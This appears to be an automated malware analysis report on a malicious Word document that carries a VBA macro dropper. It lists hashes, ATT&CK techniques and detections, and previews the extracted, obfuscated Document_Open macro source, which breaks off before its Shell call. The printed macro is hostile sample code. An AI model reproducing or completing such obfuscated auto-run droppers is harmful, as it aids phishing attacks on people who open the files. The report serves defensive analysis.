Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c53d44f4d6056a3d…

MALICIOUS

Office (OLE)

279.5 KB Created: 2017-09-19 13:23:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: aba331968ada7925a1e70e0caeea4328 SHA-1: adde3a643e02322b84288bf66bc94964ede0e188 SHA-256: c53d44f4d6056a3d6d9f7d489b1dd2f2b6f4a73b3fe60f7ad08c44156b90e2bd
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a VBA macro. The 'Document_Open' macro is present and utilizes a 'Shell()' function, indicating an attempt to execute arbitrary commands. This is a common technique for dropping and executing additional malware stages. The ClamAV detection name 'Doc.Dropper.Agent-6374902-0' further supports this dropper functionality.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6374902-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6374902-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81881 bytes
SHA-256: 4297c3ff2017261ed6916db53e36bc488e078680302d028b36abc22093733f91
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
T69wR = "ExGhLw"
If Len(T69wR) > 248 Then
MsgBox "D1Bql4EcH", 1, IcGiAxBR
End If
FcihZ = "oXgjaRmU1"
If Len(FcihZ) > 248 Then
MsgBox "MxymNMUq", 1, jKdCwP
End If
FS91Fui75 = "Z81tWvY"
FS91Fui75 = Trim(Mid(FS91Fui75, 10067 - 10066, 10067 - 10066))
p9Dgzq = "swJD1aP6"
If Len(p9Dgzq) > 226 Then
MsgBox "lBfdQ", 41, Wa87ufB
End If
jTfWgVOnZ = "lMiNa4SuT"
jTfWgVOnZ = Trim(Mid(jTfWgVOnZ, 873 / 873, 873 / 873))
oLIQF = "MM9AP6fZL"
oLIQF = Trim(Mid(oLIQF, 1300 / 650, 1300 / 650))
C649cgIU = "J5JkQwUV"
If Len(C649cgIU) > 214 Then
MsgBox "NJsZjnUa0", 61, uu0pN7F
End If
Xzvd2yBa = "h3P6Zbed7"
Xzvd2yBa = Trim(Mid(Xzvd2yBa, 1300 / 650, 1300 / 650))
U6xgET8M9 = "iHc1oKW5j"
U6xgET8M9 = Trim(Mid(U6xgET8M9, -27458 + 27459, -27458 + 27459))
FC1Jk = "tYC3w"
If Len(FC1Jk) > 188 Then
MsgBox "MydfLe", 43, G0Sbn
End If
wjx93n = "QDxhwkpn6"
If Len(wjx93n) > 188 Then
MsgBox "OQjBbkdGL", 43, vy98usZ
End If
NY03x6Zd = "kXyjT"
If Len(NY03x6Zd) > 188 Then
MsgBox "iNSaL", 43, NbYD5Mdx3
End If
drKR9YO = "3cl1kLu"
wrXNTQxb0 = "9Wa"
QduHAC = "H753JOyw"
If Len(QduHAC) > 195 Then
MsgBox "VVEgaZ9C", 33, B8JS7
End If
rboz9Q2R = "U0v31Zsp"
If Len(rboz9Q2R) > 195 Then
MsgBox "m2CjTO", 33, e1pqcxfGm
End If
GkAwVy = "NtNc4kiPK"
GkAwVy = Trim(Mid(GkAwVy, 20205 / 4041, 20205 / 4041))
JV5lbdQI = "daj2l"
If Len(JV5lbdQI) > 196 Then
MsgBox "HTkePM3u7", 51, tLu4HrQIY
End If
z8IMR = "EN0SAeh"
If Len(z8IMR) > 196 Then
MsgBox "uYvOS6X", 51, XHmQSZ
End If
Dim QkK183
QkK183 = drKR9YO & wrXNTQxb0
yAnvgRrI9 = "l5kL"
PgvLMSxTq = "tVGdzl"
uoEb1 = "MR0sldce"
If Len(uoEb1) > 195 Then
MsgBox "KgJfKD", 29, mhv0TFsy5
End If
X7wmUiOv = "jcVvbx"
If Len(X7wmUiOv) > 195 Then
MsgBox "AaFywq", 29, N0kTfIy3t
End If
WmM0af = "PSTpd6"
If Len(WmM0af) > 195 Then
MsgBox "Sg4TO0Hd", 29, et3CoVkwP
End If
uB7TMZfh = "jtobmUk"
uB7TMZfh = Trim(Mid(uB7TMZfh, 16065 / 3213, 16065 / 3213))
PActslh = "klC62Z"
PActslh = Trim(Mid(PActslh, 16065 / 3213, 16065 / 3213))
vy0efUGxr = "StAgI"
If Len(vy0efUGxr) > 145 Then
MsgBox "MA6fPR", 60, rWpzVO
End If
Dim HV5Ue3Iv
HV5Ue3Iv = yAnvgRrI9 & PgvLMSxTq
jVmkeIqpl = "GZuFmcgQ3"
mPfcbAZI = Chr(89)
g7ywe0czq = "AAhtxa2fF"
g7ywe0czq = Trim(Mid(g7ywe0czq, 4345 - 4341, 4345 - 4341))
HPO2Dea = "MAMgEJRd"
HPO2Dea = Trim(Mid(HPO2Dea, 4345 - 4341, 4345 - 4341))
tkA28hORb = "NqXM5fk"
tkA28hORb = Trim(Mid(tkA28hORb, 4345 - 4341, 4345 - 4341))
OkzyQ = "M4CKaTYuX"
If Len(OkzyQ) > 216 Then
MsgBox "vTvcDSCF", 16, O3tYkhKs
End If
gBgZc24F = "f2Pcxh5e"
If Len(gBgZc24F) > 216 Then
MsgBox "yonlO", 16, P1XqQeUhw
End If
hB83b = "t6TRIL21g"
hB83b = Trim(Mid(hB83b, -8125 + 8129, -8125 + 8129))
mexRFE = "BrU9m"
mexRFE = Trim(Mid(mexRFE, -8125 + 8129, -8125 + 8129))
Dim HaiT8w
HaiT8w = jVmkeIqpl & mPfcbAZI
Toe7E0 = "GduQmZn"
ymFzr0Phe = "hnZ"
B3T2CMJ = "YKF9tPe"
If Len(B3T2CMJ) > 202 Then
MsgBox "CvV0I", 52, F30xN5s
End If
CiBalXT = "b4a0Y"
If Len(CiBalXT) > 202 Then
MsgBox "dsNg2a4j", 52, ozcQXf
End If
ZabdLZwWv = "zx2g0bC"
ZabdLZwWv = Trim(Mid(ZabdLZwWv, 753 - 750, 753 - 750))
usYV0K = "gsCWhaxGS"
If Len(usYV0K) > 182 Then
MsgBox "UDeW3k", 12, wKLIF6
End If
FXTCMgJ = "hMLhyS8k"
FXTCMgJ = Trim(Mid(FXTCMgJ, -984 + 986, -984 + 986))
nmf7k = "T13P0usE"
nmf7k = Trim(Mid(nmf7k, -984 + 986, -984 + 986))
dVAdJ = "MkLcu4Z"
If Len(dVAdJ) > 155 Then
MsgBox "O0Rmp", 57, gG5aSF3MR
End If
SQLO9MIdG = "hTRqoOh"
If Len(SQLO9MIdG) > 155 Then
MsgBox "PYIQfN", 57, HIH0whBk
End If
Dim l1jqS
l1jqS = Toe7E0 & ymFzr0Phe
HOqmNRC = "zRXb"
sH5V2IJDX = "n12My"
WxqFwVod = Chr(78)
NYhdqem = "VaACsft"
NYhdqem = Trim(Mid(NYhdqem, 10984 / 2746, 10984 / 2746))
HQ4zd = "jypZqzOA"
HQ4zd = Trim(Mid(HQ4zd, 10984 / 2746, 10984 / 2746))
e37Kjwz = "Dg4TQzJ8H"
e37Kjwz = Trim(Mid(e37Kj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.